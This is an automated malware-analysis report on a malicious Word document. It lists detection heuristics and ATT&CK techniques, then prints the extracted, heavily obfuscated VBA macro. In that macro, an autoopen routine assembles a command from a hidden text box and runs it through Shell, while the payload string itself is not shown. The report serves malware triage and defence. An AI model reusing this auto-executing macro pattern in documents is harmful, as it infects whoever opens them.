MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function. This function is used to invoke cmd.exe, indicating an attempt to execute arbitrary commands. The presence of the 'SC_STR_CMD' and 'OLE_VBA_SHELL' heuristics strongly suggests the macro's purpose is to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics 9
-
ClamAV: Doc.Trojan.Agent-6784394-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-6784394-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(kmUtjEjj, kYZQjkENiKi), SptOpBQOE) Set wjiHXrqTHUClBvdlLkPbjYh = SWcNEpwjFOuUvXmQwqGQr -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() zHTzSqlk -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10524 bytes |
SHA-256: 3563c3585c84bc0786db20c1c1e14e85a5d2c07e60094a8ae602285f295ef248 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
282 of 329 identifiers look randomly generated (e.g. 'hTpKfrGSpSwwGaCiuFcLjLhm') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BuPVNTXjK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
zHTzSqlk
End Sub
Attribute VB_Name = "ROwOMfIHsBUr"
Function zHTzSqlk()
On Error Resume Next
Set UkhcRBShJTdvFF = wWOAObtwmwujHssjYFC
Select Case VowfaGLHAPnEFS
Case 93730478
ERVZblviXVLpRmFp = EDIaiaHQlzWKpa
ifbGkdajtRIEvWqOKzBBOF = 252861062
rNJpnYThuWKlKwFZiT = JaVMtvjLNoZaYtFPW
Case 132622984
wUzbKYLEDMsbWuqdvVBPt = CByte(MGsUwlsFiiFuXu)
zLnirjzUMDfiPKuV = ChrW(qrIripbZLwdKVcW)
RvJNjCXMlfRRDcuoNADfmURW = Log(JfhVKqaImwOkHYoU)
End Select
Set GDlXYoIfEpsStPZqHh = iXlbPKJakFanhziOwkHi
Select Case vwaVzijDXhbwHazUb
Case 147542705
POXZdBKTKBcFACOj = LGRcaXNYzraYltVOuPC
YwTnOZBvbbtsrYJVEj = 269027016
KBdKjuYIHrFnLLAOmiOBVSw = zhjNjzJLaLMWSIDUAtn
Case 240102634
GhjXujaVnWsFFNCOLY = CByte(htMzwdvdatAbiLC)
AApoPiqmpURMvBFpVfCbuh = ChrW(uzFzbnuNtDXBOVjszDZKi)
iiZoLGzJawSSvpKi = Log(zvGXJYzrUlmDYUWCi)
End Select
Set cvMbzVAkjcUaPiASGv = WzrzjWtJGtbZwlZ
Select Case jizrsrIVhImIkLpuRVFW
Case 246413159
jEDMurHDWpqFQnGDNiqWQYjl = uDhHdfCrlwvofwQNimz
fuCnOIafPiHVRoAna = 312156019
JnOfoLOhiaIlmlTtzBttUEW = CrZWrwdnjsoiQONbzas
Case 37250061
wVjwuAmjCYFQmdz = CByte(splwUCtzocloRttLRUGVqX)
wrGhUiNilPpGlHIlublKSOzP = ChrW(itzRWbvVspFOVZO)
wzZcmIEIjLuEMihtrYp = Log(NMOnulsSCXZBWkUPYmVVpr)
End Select
Set OVARdAkzFBSiEiNjBFEXk = sKfTjPozkZLJMTqrnivHBb
Select Case hljBSAhsGwXcqmKRVIFQsSuR
Case 302104528
KSacdpRNzhzNWzCjFMpqzE = MZwvKEOqRHcqPSdTiKcp
RImGOLNicDqFoNDitHJi = 279185506
FtImObtGfXPAvRMpvsBIp = mkaEapoDTGmjDs
Case 325204477
wmoWXSqoSmSELQhhsAH = CByte(LKAERcDINLOUrUwPTTh)
tmmoXkrDZErCkYQmlk = ChrW(vPhbGXzMrUSOZT)
iZYMhhkAjIULjSDJiiOlDL = Log(fQZXAiHqSiwtqOYD)
End Select
Set aLdkDOzpKCiEwOBOOc = MQkjAqpMzDzdYGdV
Select Case zbmGMNdvJLYAZrcUwMCpi
Case 195777590
NCBlMZKwVtQRnqDADHlqiQL = LVJZtafGThYDKcQVwND
IapduMzhtmPwqdZ = 281600233
kEuNKzFRAqarPrRNE = ljfihazMjScNjCZFO
Case 58772495
uwdjMuWZqivwjmO = CByte(KkGXUPwQnpmJYRJdIEKRIw)
jLBGhlTsaSNPVHloiA = ChrW(vWIMBZURqiczjNQW)
TJQiTwLrKBoVWQfR = Log(AwbwAhNUdNwUhBElaUVjhcaw)
End Select
Set iaznfNTuILCIfA = NKBzcITRjolSiaImlnrJGwc
Select Case jYJiZszztwzqoorsK
Case 63593468
zuulTAYQUnqlOhlQD = oroomYjbRzzwzwwjdVmnpiAb
LDNkIDXntVRdKIVBsibT = 156357874
rpiDPiQIKrNJaVWqIuZIGd = CTNQlzvZHHXLXCFntXkL
Case 172625863
AhzfCZjtPhOKfkCNf = CByte(OSFCDKwoDHjlWREn)
jRFvWsOspwNWVljrY = ChrW(HJwdojNWZNdKwFsRWwZQsZrJ)
NlRiVAtzVwdTCcYh = Log(TBOiAHdDPjSIEi)
End Select
Set vPRZMdduhNSIIww = XKvEThTXwipAQQp
Select Case YZKBKPDkhkFnLdDTsWuN
Case 20572211
mOvtcinciQXmjjlu = IHKWibfMTbVItWbcOmwFQmVz
GoPYuThzYlGsnEm = 105645282
JGSTktwKUzpphVlNRcnP = ZHoLVkUjaiJpkcOfmWuTNZ
Case 146867017
IqPUfWbzAskzdHOJbbuPjzw = CByte(WifFswazlwDfUADDGJpssPB)
IlrmiHLItWwzrWGDRkOh = ChrW(jobXrIWJEAHhBzH)
oUdlulzBFLkClaH = Log(TZZzQOnwowpWqQ)
End Select
Const kYZQjkENiKi = 0
Set NBtjXlrjwOXwLYTlzXozPiK = WljjKhfMAtitRAqmi
Select Case fvlkNlfRpZzlbfraKmFIYQiL
Case 317045882
qZTwjBTSDOhlXvDts = MORCCrpDhWXOMZo
vGzrszSJbctYPJEiYbwhAnXc = 57689542
UwuoCHzbAwwBNPvIbZwR = YRtqkbGvHjViQdWOmalboJ
Case 50407327
XOjmrMzdrnwiBwRjrfsNa = CByte(zlZuozMpAOKKSWrTE)
mrqchrMoJFkIRuHERzNzXwRB = ChrW(hUrfuoXawbjcVEiizpGFrz)
COFtGGYoaopzWUIOQ = Log(hVSYcwtiPXIKwvkE)
End Select
Set ElIHKjjvodYHtvmpsh = CUvwfRPwtLIpTw
Select Case oIGLVKsaHkYYVtdwbUfizIo
Case 192900525
vjnjjnEIwGdihLqJunLGst = PNhUoUvjTdVaaE
bwUQXnAPtJoUFUdXzCjYVzT = 105974477
CaJFLkQFCMPlcVPOznKzzq = qGXYtjVbdEcUMrKh
Case 162252349
PCHNlVjRJXMIQoMOSzo = CByte(WYhllhABDXnFmbjn)
cUCscWzPUonIzY = ChrW(tMBqVWcEVfOmkGWp)
YKpilUuCjVRtMsF = Log(cLaZtShAQhMOjNIwwijmijIr)
End Select
Set IzTJSRjJQsSscqLPdcDVHCW = nIIfWmtRBLwjNWOnpOLILE
Select Case MjpEMrhnGdhWKJAmizBrRriC
Case 47760718
QfsqOaiKvzhhjaUYs = fzEdpbhJKNjVBm
waCuQPGnzNBFwSaWszbXHJmp = 112520119
EPViazukhzRicoY = FQoWkrkqnVaPqonM
Case 192185062
KrSUnDKMkaFOXnw = CByte(EWBuYNfirEWitsLEBVdhukd)
LYGJlZznRvkRLiizLndih = ChrW(SrOAMCKQATtQizGWtRGj)
wIutSmjVGHvDfGPu = Log(MvdAuQYuziqpuLbzSUiUH)
End Select
Set zGLXUViwoqhIohUldnCtUnW = GJoREYWRwTzJTJNzMZLCR
Select Case khnGzuzTYLkbRKjMrPUP
Case 65918984
jKSTZDhucTSbZHiwYc = iulZrsDTzhvhBVOzcn
UuldjQJqlYhtqrvfbwla = 183474857
jiNjlQFKKCKsHZtQCI = BRuRoFqFpnwqNEwKDQCis
Case 239804991
NfiwjWlKwcraEpQYbvL = CByte(XMLzoJOpAziqRrjmG)
GjEdCOVdtVmrbih = ChrW(DBTkJaHwJwwBINIiSU)
bMuJzcKQtDIYvJwofSVzjb = Log(TFPUUjNIZGtFIIs)
End Select
Set IihaWPAQKIjKXdwwsjRtzovz = ZvVonPEMtKaDzzznb
Select Case VwfzhtPDXHDBUij
Case 65349029
UicXsczdTYvsjRFWhaAlaNcY = rwIrprTpCfIzicUhVOUUL
pwfmHiYWGCDoAfpldjbChm = 323518816
zzjEEzHDYEGKMDjkRf = FvubosjkotIGCAInJCU
Case 120546461
vAQwYiZawqlCOrb = CByte(WsLUOSKPwEJDPZ)
zNQKvifPNKKrCXEoJjjnK = ChrW(ztdpAwUVVKWInoz)
jarcwKDaHrtPzXjmYpPXj = Log(djusozVukPrczJw)
End Select
Set VkKlqSbYMmADPlwUBZhzaG = sTvqVDbisjjiUCVoFwzKDqc
Select Case zhDSBHZQPpSSubGU
Case 242663629
HTjCcRflcBavrB = hsnAIjkKQSikDtipfaziIdu
mnQfXpTwQbMiSTc = 148661498
JTjzjcswLuVrTiEwhO = QFnazjUbjvXMwdLzKL
Case 54257363
LYjLvwGzsIkkFGG = CByte(VtkRMALCniXOHjumZ)
KsYbiBZXjXLnGrX = ChrW(dQaqsLMiXMaspJOzKwwOsuO)
rpQnrAbjrNGdMiQwfuDSa = Log(hZINcKvJBiBrzDuZmXluA)
End Select
Set wowNmGPqFQqzIaKoPiQiG = HLBiliHHDowQWPrSYoEPHV
Select Case cVrVKqRnvaGjnLIVliwNBB
Case 286756313
vzwJbZrimVZItJ = RlBApQiDGQTTjJHpadnaNtHL
jXuSmzbbmjbzABnMtq = 296558625
GKZfjwfGjjYdpiG = olURsrucfpacANUCODPZwOl
Case 260045438
VsDIzJWvuYHWbPPPwz = CByte(YCFWOVPmOjuZAjzXzrUifDj)
pNjnoAJCPvORPWo = ChrW(iXHOAwHqirQYcRKUWzjBpc)
OWrJERjHcChzIwRFqGqJwkla = Log(ktvQpnzGZssIoCYzknVvRCYE)
End Select
kmUtjEjj = BuPVNTXjK.TextBox1 + LwWJAEa + JOsBXCrM + IpkfujR + MORiNc + ofmwN + kwcjj + wSFAnXt + iooAI + jXnopJ + fjcvzG
Set ZCfPnFPMBiZZYp = dvZIOoTQBBTnWzQ
Select Case vzwhjbtMzKYkmPIYaVkBtn
Case 293445930
FmiNURtMlrdcZIZCC = KEQjdltvNAPOuIEj
twjsfQMwvmjwSvhzfco = 337227528
IsTYEtwXwUXqhfFWUf = EkhwMwuEhPOjQkFlEMTaXQ
Case 182484867
RIIkPcdKzBvlatGcJoOHhoHG = CByte(uAKBEPoIijEoJoElDjP)
TKKFrRjBTRdBBIVbTJslGd = ChrW(NCnzAJWiFsRIjqEKmjmpRDC)
ATdSuqdiqSzCDRjszmYJkA = Log(lOzFFUoaJzBwhjDkOOjSQ)
End Select
Set OBQNWWjUYfnsOAqQoEiAzSBZ = iGGqPZMdjiljzBLESX
Select Case UiTqTIUpcqzvzqss
Case 104307085
iIGaPhRFjqCTvfvpFrKP = iujkminltFJvboOGtPlYOb
nJvSzKkAhzqvNWqdziTn = 245244655
XUrhjMbYrXHQwaqQnbIEbvl = AjDmmuuosumbaRbYZJISozZ
Case 99691543
jrsfjQbiwhzIolzcTXBoPp = CByte(zjfSnSECJoADCCIMdL)
ckbQkYLpUZYaWtVsvBwnQti = ChrW(ToiuaKLYdXMkYSuubcjdlN)
JhJMKiXbiGmwvpRPKOzz = Log(hkUcHEMnJBDFLZNQzAtGvdil)
End Select
Set ozpiqVQYFwDCvizbUzATNzrB = PnFzIzDUCWuNiDfQwmOphNqw
Select Case KGwimpInibhLazBzhs
Case 80050343
OpwVCQMdMRCzGi = qFqPhmazbwFWoMpAUivEUKcb
cfbNZkEvAKurdfRopU = 152596978
uXQWRhSKZcjcOtEGwmCNAaoC = IqziQipFibFOEvrStWXiRdj
Case 176330039
pDSJwUiObIqSjIwq = CByte(jSwstqKvGDRYdfHYUa)
XwiHWAdnAzNNYnvtRbS = ChrW(MHOpQQqwcjtLiWTaBKcrQDJv)
qskimpzBiPQhsqFKfKRFBfC = Log(UrGzajIzSzZXFQqtwK)
End Select
Set vKwiFBkdODpcVX = hzjwAmMzVhCpNmoCAQ
Select Case ZNKIVtjzTjmRZsjv
Case 43422683
koPjNdBCLWrZApMJwIWq = DTpsOiQdwiriXPbw
AjHThJGuizEQuaYPQhUaqw = 305666240
YOszrcZkMIIqjuWKjwflL = CESSHiHWzBmWuSRG
Case 20472582
YUDlRijVLJrsSJZ = CByte(MnjYVqdpJHDNADtc)
aNqJRmkmlXziGidwiGdZijh = ChrW(NcKiTUHQOzsviBuBwmjTjLC)
aQRwQDQqfzvobFSRPjQ = Log(qhNhLbdrANKCZlE)
End Select
KzKhB = Array(iFGZqT, Dzutis, kloaY, Interaction _
_
_
_
_
_
_
_
.Shell(kmUtjEjj, kYZQjkENiKi), SptOpBQOE)
Set wjiHXrqTHUClBvdlLkPbjYh = SWcNEpwjFOuUvXmQwqGQr
Select Case mbumTPZiKYzupBOdOSWS
Case 209821847
AJqnwwiqRRsojBTSViKWEW = BikCTbntZwzakvfQaE
GiCBRNJwwnHIhdopFN = 318932753
OdXSpkaiWpSjSkQn = hTpKfrGSpSwwGaCiuFcLjLhm
Case 176497827
HVXqzNBqXuHAjmQAASd = CByte(QPPFYiocPWmCjGjluzUjuQ)
IWtWpujKPJoJrG = ChrW(RSZZbBHEQdCfFBztr)
MGiiIzhfLXsvws = Log(chBKVoABRdsmPdJRPwJf)
End Select
Set iljmpQvfVVTcTkP = SzUiKrTNIkbJtYwH
Select Case pPbIzznITzTwRI
Case 257020255
SUqjdzmRViFolmwZMYdVnFV = hVquzOqcoPaEFaZrdJmSuwWh
umsiRFNzszIHsR = 47070500
dAVLrTmzmriSCDiwJsFczz = KNFMaRklrfiQzBVJaA
Case 300962522
ZbuwoQKzzMipfdLwmGLhBGm = CByte(XnkzojfbEFziSIYJHnmfAo)
UpWXToMqToHYBfMIQjCla = ChrW(djiiBaOUHmjCQHSMLnsP)
tLjWduiWwzCKoMpskmlb = Log(hUpzPEqDUPtKCjVuMXjkwIpj)
End Select
Set jawTvSltNZsnijWszU = ZDzrRAnLtDlDCNjwZptjb
Select Case wWFAWnWlTduQPSh
Case 225303353
SHGrpcWqaunzDEkHQEcm = iAoIkHIlzRPqIacUR
uiKwsjoPZJJzOEv = 106859659
HRjFUNEdcXGudImwviDFiH = TUizczDKvsmUChE
Case 169092663
GSPLiVvAWASWrKGAMP = CByte(mNcjZMKCrojQrIizPrulz)
wGwkoDijTqSTnHimqwXSEL = ChrW(kbNJKqJSilwPWjpYHULVtw)
VaVdAvOjjnTMJbtXpJY = Log(iosICBaQwtqtlDsjpMIWQE)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.